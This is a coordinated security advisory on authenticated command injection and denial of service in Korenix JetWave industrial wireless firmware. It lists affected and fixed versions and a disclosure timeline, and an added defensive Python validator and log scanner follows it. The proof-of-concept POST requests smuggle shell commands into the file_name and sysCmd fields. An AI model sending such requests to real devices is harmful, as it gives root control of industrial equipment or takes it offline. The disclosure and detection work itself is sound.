Korenix JetWave Command Injection / Denial Of Service

Multiple versions of Korenix JetWave suffer from authenticated command injection and denial of service vulnerabilities.

Packet Storm
CyberDanube Security Research 20230213-0
-------------------------------------------------------------------------------
               title| Multiple Vulnerabilities
             product| JetWave4221 HP-E, JetWave 2212G, JetWave 2212X/2212S,
                    | JetWave 2211C, JetWave 2411/2111, JetWave 2411L/2111L,
                    | JetWave 2414/2114, JetWave 2424, JetWave 2460,
                    | JetWave 3220/3420 V3
  vulnerable version| See "Vulnerable Versions"
       fixed version| See "Solution"
          CVE number| requested
              impact| High
            homepage| https://korenix.com/
               found| 2022-11-28
                  by| S. Dietz, T. Weber (Office Vienna)
                    | CyberDanube Security Research
                    | Vienna | St. Pölten
                    |
                    | https://www.cyberdanube.com
-------------------------------------------------------------------------------

Vendor description
-------------------------------------------------------------------------------
"Korenix Technology, a Beijer group company within the Industrial Communication
business area, is a global leading manufacturer providing innovative, market-
oriented, value-focused Industrial Wired and Wireless Networking Solutions.
[...]
Our products are mainly applied in SMART industries: Surveillance, Machine-to-
Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer
base covers different Sales channels, including end-customers, OEMs, system
integrators, and brand label partners."

Source: https://www.korenix.com/en/about/index.aspx?kind=3

Vulnerable Versions:
-------------------------------------------------------------------------------
The following firmware versions have been found to be vulnerable by
CyberDanube:
  * Korenix JetWave4221 HP-E <= V1.3.0
  * Korenix JetWave 3220/3420 V3 < V1.7

The following firmware versions have been identified to be vulnerable by the
vendor:
  * Korenix JetWave 2212G V1.3.T
  * Korenix JetWave 2212X/2112S V1.3.0
  * Korenix JetWave 2211C < V1.6
  * Korenix JetWave 2411/2111 < V1.5
  * Korenix JetWave 2411L/2111L < V1.6
  * Korenix JetWave 2414/2114 < V1.4
  * Korenix JetWave 2424 < V1.3
  * Korenix JetWave 2460 < V1.6

Vulnerability overview
-------------------------------------------------------------------------------
1) Authenticated Command Injection
The web server of the device is prone to an authenticated command injection.
It allows an attacker to gain full access to the underlying operating system of
the device with all implications. If such a device is acting as a key device in
an industrial network, or controls various critical equipment via serial ports,
more extensive damage in the corresponding network can be done by an attacker.

2) Authenticated Denial of Web-Service
When logged in, a user can issue a POST request such that the underlying binary
exits. The Web-Service becomes unavailable and cannot be accessed until the
device gets rebooted.

Proof of Concept
-------------------------------------------------------------------------------
1) Authenticated Command Injection

1.a)
The command "touch /tmp/poc" was injected into the system by using the following
POST request:
===============================================================================
POST /goform/formTFTPLoadSave HTTP/1.1
Host: 172.16.0.38
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
Origin: http://172.16.0.38
Connection: close
Referer: http://172.16.0.38/mgmtsaveconf.asp
Cookie: -common-web-session-=::webs.session::d7af70f81033cff3828902e476ceda45
Upgrade-Insecure-Requests: 1

submit-url=%2Fmgmtsaveconf.asp&ip_address=192.168.1.1&file_name=%24%28touch+%2Ftmp%2Fpoc%29&tftp_action=load&tftp_config=Submit
===============================================================================
The command gets executed as root and a file under the folder /tmp/ is created.

1.b)
The command "touch /tmp/poc2" was injected into the system by using the
following POST request:
===============================================================================
POST /goform/formSysCmd HTTP/1.1
Host: 172.16.0.38
Content-Type: application/x-www-form-urlencoded
Connection: close
Referer: 172.16.0.38
Cookie: -common-web-session-=::webs.session::df1307d508d798638a8b4572987462bb
Content-Length: 40

sysCmd=touch%20/tmp/poc2&submit-url
===============================================================================
The command gets executed as root and a file under the folder /tmp/ is created.
Command output is written into /tmp/syscmd.

2) Authenticated Denial of Web-Service
The process goahead crashes when the following POST request is sent to the
endpoint /goform/formDefault:
===============================================================================
POST /goform/formDefault HTTP/1.1
Host: 172.16.0.38
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Origin: http://172.16.0.38
Connection: close
Referer: http://172.16.0.38/toolping.asp
Cookie: -common-web-session-=::webs.session::3c624961199904f380e978a3967cc356
Upgrade-Insecure-Requests: 1

PingIPAddress=127.0.0.1&submit-url=%2Ftoolping.asp&Submit=Ping
===============================================================================
The following output was observed on the terminal of our emulated instance:
===============================================================================
rm: invalid option -- /
BusyBox v1.01 (2022.10.21-00:22+0000) multi-call binary

Usage: rm [OPTION]... FILE...

Remove (unlink) the FILE(s).  You may use '--' to
indicate that all following arguments are non-options.

Options:
     -i        always prompt before removing each destination
     -f        remove existing destinations, never prompt
     -r or -R    remove the contents of directories recursively
killall: wlwatchdog: no process killed
killall: wlapwatchdog: no process killed
===============================================================================
The vulnerabilities were manually verified on an emulated device by using the
MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution
-------------------------------------------------------------------------------
Owners of these products are advised to update to the following versions:
  * Korenix JetWave 4221 HP-E V1.4.0
  * Korenix JetWave 2212G V1.10
  * Korenix JetWave 2212X/2112S V1.11
  * Korenix JetWave 2211C V1.6
  * Korenix JetWave 2411/2111 V1.5
  * Korenix JetWave 2411L/2111L V1.6
  * Korenix JetWave 2414/2114 V1.4
  * Korenix JetWave 2424 V1.3
  * Korenix JetWave 2460 V1.6
  * Korenix JetWave 3220/3420 V3 V1.7

Recommendation
-------------------------------------------------------------------------------
CyberDanube recommends customers of Korenix to upgrade the firmware to the
latest version available. Furthermore, a full security review by professionals
is recommended.

Contact Timeline
-------------------------------------------------------------------------------
2022-12-05: Contacting Beijer Electronics Group via [email protected]: Meeting
            with Beijer Electronics. Vulnerabilities were confirmed by the
            vendor. The vendor planned to fix the vulnerabilities in the next
            1.5 months.
2023-01-04: Contact shared the updated firmware version. CyberDanube checked
            if the vulnerabilities got fixed. The contact communicated that
            not only JetWave4221 is vulnerable to these issues. Therefore,
            CyberDanube postponed the release of the advisory until the other
            products have been patched.
2023-01-30: Meeting with Beijer Electronics. Customers got informed about the
            issues. Fixes got published. Disclosure date got shifted to
            2023-02-13 to provide a time-window for patching.
2023-02-13: Coordinated release of security advisory.

Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Mail: research at cyberdanube dot com

EOF S. Dietz, T. Weber / @2023
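The two injection findings above share one root cause: form values (file_name on /goform/formTFTPLoadSave, sysCmd on /goform/formSysCmd) reach a shell as part of a command line. The script below is an added example, not code from the CyberDanube advisory or from Korenix firmware. It shows two defender-side pieces: the allowlist validation a fixed handler would apply to the TFTP parameters before building any command (the allowlist pattern and the length bound are assumptions, not the vendor's fix), and a detector that scans a constructed, simplified request log (client, method, path, URL-encoded body) for the injection pattern on the endpoints named in the advisory. The PoC bodies from the advisory are reused as sample input.

```python
"""Validation and detection helpers for the JetWave formTFTPLoadSave and
formSysCmd findings. Added example; endpoint and parameter names come from the
advisory's PoC requests, everything else (log format, allowlist) is assumed."""
import ipaddress
import re
from urllib.parse import parse_qs

# Endpoints named in the advisory.
TFTP_PATH = "/goform/formTFTPLoadSave"
SYSCMD_PATH = "/goform/formSysCmd"

# Characters that let a value break out of a shell word or start a command
# substitution; the PoC relies on "$(" ... ")".
SHELL_META = re.compile(r'[;&|`$(){}<>\\"\'\n]')

# Hypothetical allowlist for a configuration file name: starts with an
# alphanumeric, contains no slashes or metacharacters, at most 64 characters.
FILE_NAME_OK = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


def valid_ipv4(value):
    """True if value parses as a dotted-quad IPv4 address."""
    try:
        ipaddress.IPv4Address(value)
        return True
    except ValueError:
        return False


def validate_tftp_params(params):
    """Allowlist checks a fixed formTFTPLoadSave handler should apply before
    any value reaches a command line. Returns the names of the parameters
    that fail; an empty list means the request may proceed."""
    rejected = []
    if not valid_ipv4(params.get("ip_address", "")):
        rejected.append("ip_address")
    if not FILE_NAME_OK.match(params.get("file_name", "")):
        rejected.append("file_name")
    if params.get("tftp_action") not in ("load", "save"):
        rejected.append("tftp_action")
    return rejected


def decode_body(body):
    """URL-decode an application/x-www-form-urlencoded body into
    {name: first value}; keys without '=' are kept with an empty value."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def suspicious_params(path, body):
    """Names of parameters in a watched request that look like an injection
    attempt; empty list for benign or unwatched requests."""
    params = decode_body(body)
    if path == TFTP_PATH:
        return [f for f in ("ip_address", "file_name")
                if SHELL_META.search(params.get(f, ""))]
    if path == SYSCMD_PATH:
        # This endpoint exists to run a command as root; any use of it is
        # worth an alert, whatever the command text is.
        return ["sysCmd"] if params.get("sysCmd") else []
    return []


def scan_log(lines):
    """Scan constructed log lines of the form '<client> <method> <path> [<body>]'
    and return (client, path, flagged_parameters) for each suspicious POST."""
    hits = []
    for line in lines:
        parts = line.split(" ", 3)
        if len(parts) < 3 or parts[1] != "POST":
            continue
        client, _, path = parts[:3]
        body = parts[3] if len(parts) == 4 else ""
        flagged = suspicious_params(path, body)
        if flagged:
            hits.append((client, path, flagged))
    return hits


# Constructed sample log: one benign config load, the two PoC bodies from the
# advisory, and an unrelated GET.
SAMPLE_LOG = [
    "172.16.0.5 POST /goform/formTFTPLoadSave submit-url=%2Fmgmtsaveconf.asp"
    "&ip_address=192.168.1.1&file_name=running.cfg&tftp_action=load",
    "172.16.0.9 POST /goform/formTFTPLoadSave submit-url=%2Fmgmtsaveconf.asp"
    "&ip_address=192.168.1.1&file_name=%24%28touch+%2Ftmp%2Fpoc%29&tftp_action=load",
    "172.16.0.9 POST /goform/formSysCmd sysCmd=touch%20/tmp/poc2&submit-url",
    "172.16.0.5 GET /toolping.asp",
]

if __name__ == "__main__":
    for client, path, fields in scan_log(SAMPLE_LOG):
        print(f"{client} {path}: injection-like value in {fields}")
```

The validator rejects the PoC's file_name value on the allowlist alone, without needing to recognise any particular metacharacter; the detector uses the broader metacharacter class because log review has to tolerate legitimate file names the allowlist would not accept. Keeping /goform/formSysCmd as an unconditional alert reflects that the endpoint itself, not a malformed value, is the exposure there.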
